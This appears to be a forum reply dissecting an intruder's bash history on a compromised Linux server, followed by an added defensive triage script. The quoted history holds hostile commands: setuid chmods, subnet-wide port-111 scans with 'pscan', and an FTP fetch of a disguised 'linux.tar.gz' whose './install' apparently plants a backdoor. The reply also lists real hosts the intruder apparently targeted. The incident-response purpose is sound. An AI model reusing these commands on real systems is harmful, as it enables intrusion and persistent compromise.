If you run updatedb via cron (or have run it from the shell by hand recently), it'll tell you if you have any of the evil files on your computer:

  locate pscan
  locate wuftp
  locate bnc2
  locate .shit
  locate anatomy
  locate kod
  locate '/b$'

If you find any source files (*.c or *.pl), consider finding a Debian guru to hand them to, in case this kind of thing can be snuffed in the future. Might help, you never know.
Here's my run through the command history...

  >cd /
  >cd home
  >cd .dead
  >mkdir .dead
  >cd .dead

Somehow, your invader transferred some files here into /home/.dead/ at this point. Must've used his own FTP client, meaning he used your server -- on my Debian box the FTP transfers are logged in /var/log/xferlog. See if you've still got yours; it might help.

  >cc anatomy.c -o anatomy
  >cc kod.c -o kofd

I'd guess that 'anatomy' scans your directory tree and reports it back to the IP supplied as its command-line argument. Or it may copy everything. Maybe it scans the structure of the remote site. Don't know. (You may still have the source code; if so, it might be helpful to hand it off to some of the C++ gurus around here so they can wedge it out of existence...)

  >cp kofd kod
  >rm kofd

Hmm! He never directly called kod, but some of the other programs may have.

  >cd home
  >cd httpd
  >cd icons
  >cd small
  >cd .shit

Looks like cut & paste, and maybe the last two didn't take.

  >mkdir small
  >cd small
  >mkdir .shit
  >cd .shit

So I guess he's now at /home/httpd/icons/small/.shit

  >who

Unless there's a logout and login to another directory, more files were transferred here somehow.

  >chmod 777 *
  >chmod +s *
  >chmod 666 *
  >chmod 777 *
  >./pscan
  >./b
  >./pscan 167.64 111

And it looks like PSCAN does a whole zone at a time. To what end, I don't know. Down a bit, there's

  >./pscan 198.138 111
  >cat wuftp.log
  >rm wuftp.log
  >./pscan 198.59 111
  >cat wuftp.log

So the PSCAN program creates "wuftp.log", I guess. Of course, he zapped it before checking out. I'd bet it was in /home/httpd/icons/small/.shit/ along with some other files... may still be there. Seemed to run the PSCAN on an IP net range, then check the wuftp log file, apparently to get other IP ranges to scan. ? (You might try seeing if there's any left on the system. May be informative.)
Now THIS part I would consider very bad news:

  >ftp columbia.digiweb.com
  [obviously transferring linux kernel here]
  >tar -zxvf linux.tar.gz
  >cd .bd
  >./install

(I know, it's all bad news, but some is badder than others.)

There's also a

  >telnet 198.150.93.205

which reports as nonexistent just now, so it's probably a transient or dynamically-allocated PPP-like address.

===

To find where the IPs are that he/she was interested in (in case it helps any, or you want to contact their sysadmins), I did this in tcsh:

  % grep anatomy bash_history.txt | cut -f2 "-d "
  216.209.196.154
  216.209.205.68
  216.209.207.150
  212.1.128.61
  212.1.128.61
  % foreach x(`!!`)
  foreach x ( `grep anatomy bash_history.txt | cut -f2 "-d "` )
  foreach? nslookup $x
  foreach? end
  Name:    HSE-Montreal-ppp33164.qc.sympatico.ca
  Address: 216.209.196.154
  Name:    HSE-Montreal-ppp35364.qc.sympatico.ca
  Address: 216.209.205.68
  Name:    HSE-Quebec-City-ppp35954.qc.sympatico.ca
  Address: 216.209.207.150
  Name:    cache-1.www.telinco.net
  Address: 212.1.128.61
  Name:    cache-1.www.telinco.net
  Address: 212.1.128.61

Maybe he/she had some friends in Canada...?

And for the "./b" program:

  foreach x ( `grep /b bash_history.txt | cut -f2 "-d " | sort | uniq` )
  foreach? nslookup $x >> bash_crack
  foreach? end

  *** localhost can't find 156.26.120.34: Non-existent host/domain
  *** localhost can't find 192.203.80.144: Non-existent host/domain
  *** localhost can't find 198.150.93.205: Non-existent host/domain
  *** localhost can't find 198.247.5.164: Non-existent host/domain
  *** localhost can't find 204.116.202.5: Non-existent host/domain
  *** localhost can't find 204.185.91.12: Non-existent host/domain
  *** localhost can't find 206.252.255.42: Non-existent host/domain
  *** localhost can't find 208.135.205.67: Non-existent host/domain
  *** localhost can't find e150.135.112.129: Non-existent host/domain
  Name:    netman.net.okstate.edu
  Address: 139.78.100.200
  Name:    www.safarir.com
  Address: 142.169.8.215
  Name:    midian.arc.nasa.gov
  Address: 143.232.55.1
  Name:    Westgate-AStar-OC3.Telcom.Arizona.EDU
  Address: 150.135.112.129
  Name:    bccs.sunybroome.edu
  Address: 192.203.130.28
  Name:    amber.inr.ac.ru
  Address: 192.203.80.142
  Name:    photon.inr.ruhep.ru
  Address: 192.203.80.149
  Name:    Galahad.Camelot.com
  Address: 192.55.203.135
  Name:    atmr-ulcc.lmn.net.uk
  Address: 194.83.100.85
  Name:    surw.chel.su
  Address: 195.54.2.162
  Name:    gw.daily.ru
  Address: 195.54.221.21
  Name:    tisa.alias.ru
  Address: 195.54.29.7
  Name:    optima.mgn.chel.su
  Address: 195.54.3.134
  Name:    ocotillo.sfps.k12.nm.us
  Address: 198.59.112.9
  Name:    hebi.swcp.com
  Address: 198.59.115.35
  Name:    brahe.phys.unm.edu
  Address: 198.59.169.11
  Name:    rcde19.arc.unm.edu
  Address: 198.59.173.186
  Name:    uofr-vbns1.nysernet.net
  Address: 199.109.4.21
  Name:    ls1010.nswrno.net.au
  Address: 203.15.123.146
  Name:    dsl.three.lorettotel.net
  Address: 204.116.104.205
  Name:    dslhp-100.dsl.nstelco.com
  Address: 204.116.30.166
  Name:    www.centralia.k12.mo.us
  Address: 204.185.56.250
  Name:    pagis.kings.edu
  Address: 205.238.205.10
  Name:    svcr-adsl-205-238-238-112.epix.net
  Address: 205.238.238.112
  Name:    alborada-119.pangeatech.primenet.com
  Address: 206.132.219.119
  Name:    alborada-170.pangeatech.primenet.com
  Address: 206.132.219.170
  Name:    reserved-34-52.cybercowboys.com
  Address: 206.132.34.52
  Name:    t1-t3-dsl.com
  Address: 216.156.219.216
  Name:    www.cqhost.com
  Address: 216.167.50.150
  Name:    telesync.com
  Address: 207.69.134.42
  Aliases: www.telesync.com

===

Sorry this happened! Hopefully your troubles can help us all avoid it in the future... do you have any idea how they originally got in?
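An added example (editor's addition, not part of the post above) that does the two chores the post describes offline and repeatably: pull the target addresses out of a recovered bash_history per tool (the `grep anatomy | cut` and `grep /b | sort | uniq` loops, without the `!!` history expansion or the false hits a bare `grep /b` can produce), turn pscan's two-octet arguments into ranges, and sweep the filesystem with find(1) for the filenames the `locate` list names when updatedb has not run since the break-in. The history lines are constructed from the excerpt in the post, not real data; reading `./pscan 167.64 111` as a sweep of the whole 167.64.0.0/16 is an assumption, as is the set of tool names.

```sh
#!/bin/sh
# Added example, not from the original post: offline triage of a recovered
# bash_history, plus a find(1) sweep for the filenames the post lists.
# Assumptions: one command per history line; tool names as in the post
# (pscan, anatomy, b); a two-octet pscan argument means the whole /16.

# Constructed sample history modelled on the post's excerpt (not real data).
make_sample_history() {
  cat > "$1" <<'EOF'
cd /home/httpd/icons/small/.shit
chmod 777 *
./pscan
./b
./pscan 167.64 111
./pscan 198.138 111
cat wuftp.log
rm wuftp.log
./pscan 198.59 111
./anatomy 216.209.196.154
./anatomy 212.1.128.61
./anatomy 212.1.128.61
./b 139.78.100.200
./b 198.59.112.9
./b 139.78.100.200
telnet 198.150.93.205
EOF
}

# Unique first arguments handed to one tool ($2) in history file $1.
# Matches "tool ..." and "./tool ..." only at the start of the line, so a
# path like /home/.shit/b elsewhere in a command is not taken as a target;
# invocations with no argument (a bare "./pscan") are skipped.
targets_for() {
  awk -v tool="$2" '
    ($1 == tool || $1 == ("./" tool)) && NF >= 2 { print $2 }
  ' "$1" | sort -u
}

# pscan was invoked as "./pscan 167.64 111": two octets and a port (111 is
# portmap). Assume the two-octet form swept the whole /16 and emit CIDR so it
# can be matched against xferlog / firewall entries from the same period.
scanned_ranges() {
  targets_for "$1" pscan | awk -F. '
    NF == 2 { print $0 ".0.0/16"; next }
    NF == 3 { print $0 ".0/24"; next }
    { print $0 "/32" }
  '
}

# Every distinct full IPv4 address handed to any of the tools or to
# telnet/ftp: the list to resolve and to use when contacting sysadmins.
all_contact_ips() {
  for t in anatomy b pscan telnet ftp; do targets_for "$1" "$t"; done |
    grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | sort -u
}

# find(1) equivalent of the locate list in the post, for when updatedb has
# not run since the break-in (locate would miss the new files). $1 = root.
find_suspect_files() {
  find "$1" \( -name pscan -o -name wuftp -o -name 'bnc2*' -o -name .shit \
             -o -name anatomy -o -name kod -o -name wuftp.log -o -name .bd \
             -o -name b \) 2>/dev/null | sort
}

# Run with --demo to see the extraction against the constructed history.
if [ "${1:-}" = "--demo" ]; then
  h=$(mktemp)
  make_sample_history "$h"
  echo "anatomy targets:"; targets_for "$h" anatomy
  echo "pscan ranges:";    scanned_ranges "$h"
  echo "all IPs:";         all_contact_ips "$h"
  rm -f "$h"
fi
```

To get the reverse lookups the post did with tcsh, feed the list to a loop such as `all_contact_ips bash_history.txt | while read ip; do host "$ip"; done > bash_crack` (host(1) or nslookup, whichever you have); the extraction itself needs no network, so it can be run on a copy of the history taken off the box before anything else is touched.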